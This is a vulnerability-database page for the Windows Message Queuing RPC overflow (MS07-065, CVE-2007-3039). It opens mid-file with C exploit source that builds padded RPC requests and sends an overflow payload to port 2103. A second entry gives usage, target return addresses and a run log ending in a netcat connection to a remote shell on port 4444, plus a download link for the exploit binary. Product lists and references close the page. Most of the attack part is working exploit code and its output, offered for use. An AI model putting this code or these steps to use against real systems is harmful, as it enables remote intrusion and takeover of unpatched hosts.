0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41
};
char request_2[] = {
0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
void
usage (char *argv)
{
printf (" Usage: %s -h 127.0.0.1 (Universal exploit)\n", argv);
printf (" %s -h host -n dnsname [-p port]\n", argv);
exit (1);
}
/************* TCP connect *************************/
void Disconnect (SOCKET s);
// ripped from isno
int
Make_Connection (char *address, int port, int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket (AF_INET, SOCK_STREAM, 0);
if (s < 0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr (address);
if (target.sin_addr.s_addr == 0)
{
closesocket (s);
return -2;
}
target.sin_port = htons ((short) port);
bf = 1;
ioctlsocket (s, FIONBIO, &bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO (&wd);
FD_SET (s, &wd);
connect (s, (struct sockaddr *) &target, sizeof (target));
if ((i = select (s + 1, 0, &wd, 0, &tv)) == (-1))
{
closesocket (s);
return -3;
}
if (i == 0)
{
closesocket (s);
return -4;
}
i = sizeof (int);
getsockopt (s, SOL_SOCKET, SO_ERROR, (char *) &bf, &i);
if ((bf != 0) || (i != sizeof (int)))
{
closesocket (s);
return -5;
}
ioctlsocket (s, FIONBIO, &bf);
return s;
}
void
Disconnect (SOCKET s)
{
closesocket (s);
WSACleanup ();
}
/****************************************************/
int
main (int argc, char *argv[])
{
unsigned char *target = NULL;
unsigned char *name = NULL;
int port = 2103;
int i, j, len, len2;
int ret;
char buffer[6000] = { 0 };
SOCKET s;
WSADATA WSAData;
printf("--------------------------------------------------------------------------\n");
printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n");
printf("-== code by axis@ph4nt0m ==-\n");
printf("-== Http://www.ph4nt0m.org ==-\n");
printf("-== Tested against Windows 2000 server SP4 ==-\n");
printf
("--------------------------------------------------------------------------\n\n");
if (argc < 5)
usage (argv[0]); //Handle parameters
for (i = 1; i < argc; i++)
{
if ((argv[i][0] == '-'))
{
switch (argv[i][1])
{
case 'h':
target = (unsigned char *) argv[i + 1];
break;
case 'p':
if (strcmp (argv[i + 1], "2103") == 0)
{
printf ("[+] Attacking default port 2103\n");
}
else
{
port = atoi (argv[i + 1]);
}
break;
case 'n':
name = (unsigned char *) argv[i + 1];
break;
default:
printf ("[-] Invalid argument: %s\n", argv[i]);
usage (argv[0]);
break;
}
i++;
}
else
usage (argv[0]);
}
request_1b = malloc (sizeof (char) * (strlen (name) * 2));
if (request_1b == NULL)
{
printf ("Allocation Error\n");
exit (1);
}
strcpy (request_1b, name);
for (i = 0, j = 0; j < (strlen (name) * 2); j++)
{
if (!(j % 2))
{
*(request_1b + j) = *(name + i);
}
else
{
*(request_1b + j) = '\x00';
i++;
}
}
/********************** attack payload ***************************/
if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0)
{
fprintf (stderr, "[-] WSAStartup failed.\n");
WSACleanup ();
exit (1);
}
Sleep (1200);
s = Make_Connection ((char *) target, port, 10);
if (s < 0)
{
fprintf (stderr, "[-] connect err.\n");
exit (1);
}
//Send our evil Payload
printf ("[*]Sending our Payload, Good Luck! ^_^\n");
printf ("[*]Sending RPC Bind String!\n");
send (s, bind_str, sizeof (bind_str), 0);
Sleep (1000);
printf ("[*]Sending RPC Request Now!\n");
len = 56 + (strlen (name) * 2) + 640;
request_1 = calloc (len, sizeof (char));
if (request_1 == NULL)
{
printf ("Allocation Error\n");
exit (1);
}
memcpy (request_1, request_1a, 56);
memcpy (request_1 + 56, request_1b, (strlen (name) * 2));
memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640);
exit(1);
memset (buffer, '\x41', sizeof (buffer)); // fil the buffer to trigger seh
send (s, request_1, sizeof (request_1), 0);
send (s, buffer, 5104, 0); // fil the buffer to trigger seh
send (s, request_2, sizeof (request_2), 0);
Sleep (100);
memset (buffer, 0, sizeof (buffer));
ret = recv (s, buffer, sizeof (buffer) - 1, 0);
//printf("recv: %s\n", buffer);
Disconnect (s);
return 0;
}
// milw0rm.com [2008-01-18]
Exploit Database EDB-ID : 4760
Date de publication : 2007-12-20 23h00 +00:00
Auteur : Andres Tarasco
EDB Vérifié : Yes
******************************************************************************
********************** merry christmas Sysadmins *****************************
******************************************************************************
************** Microsoft Message Queue POC exploit ( MS07-065 ) **************
Mario Ballano - (mballano~gmail.com) - http://www.48bits.com
Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org
******************************************************************************
* Original Advisory:
http://www.zerodayinitiative.com/advisories/ZDI-07-076.html
* Microsoft Bulletin :
http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx
* CVE Code: CVE-2007-3039
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039
* Timeline:
No naked news this time, just rum and whiskey
* Additional information:
From Microsoft support http://support.microsoft.com/?id=178517 : RPC dynamic RPC ports for MQ 2101,2103,2105
HSC of course http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html
DaveŽs unmidl http://www.immunitysec.com/resources-freesoftware.shtml
* How to compile: Call your favorite SetEnv.Cmd from microsoft SDK and then exec nmake.
* Note: There are several rpc ports to trigger the overflow. If you hit a system then
looks like youŽll need to send the exploit twice or specify another port (-p ) to exploit it again.
There is a chance that offsets are invalid for windows 2000 server (only spanish win2k advanced server was tested)
Adjust them if needed.
*Usage:
C:\Programación\MessageQueue>MessageQueue.exe
--------------------------------------------------------------
Microsoft MessageQueue local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 Advanced server SP4
--------------------------------------------------------------
Usage: MessageQueue.exe -h hostname [-d Dnssuffix] [-n netbiosname] [-p port] [-t lang]
Targets:
0 (0x6bad469b) - Windows 2000 Advanced server English (default - untested)
1 (0x6b9d469b) - Windows 2000 Advanced server Spanish
2 (0x41414141) - Windows 2000 Advanced server crash
C:\Programación\\MessageQueue>MessageQueue.exe -h 192.168.1.39
--------------------------------------------------------------
Microsoft MessageQueue local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 Advanced server SP4
--------------------------------------------------------------
[+] Binding to ncacn_ip_tcp:192.168.1.39
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[LRPC00000414.00000001]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QMsvc$testserver]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QmReplService]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncalrpc:[QMMgmtFacility$testserver]
[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.39[1222]
[+] Using gathered netbios name: testserver
[+] Dynamic MessageQueue rpc port found (1222)
[+] Connecting to fdb3a030-065f-11d1-bb9b-00a024ea5525@ncacn_ip_tcp:192.168.1.39[1222]
[+] RpcBindingFromStringBinding success
[+] Trying to fingerprint target...
[+] Fqdn name obtained from netbios packet: testserver.local
[+] Remote OS Fingerprint (05.00)
[+] Remote Host identified as Windows 2000
[+] Sending POC Exploit code to QMCreateObjectInternal()
[+] Try to connect to remote host at port 4444 for a shell
C:\>nc 192.168.1.39 4444
Microsoft Windows 2000 [Versión 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Download:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4760.zip (2007-MessageQueue.zip)
# milw0rm.com [2007-12-21]
Products Mentioned
Configuraton 0
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Message_queuing >> Version *
- Microsoft>>Message_queuing >> Version - (Open CPE detail)
Références
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4474
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-065
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
http://www.securityfocus.com/archive/1/484891/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
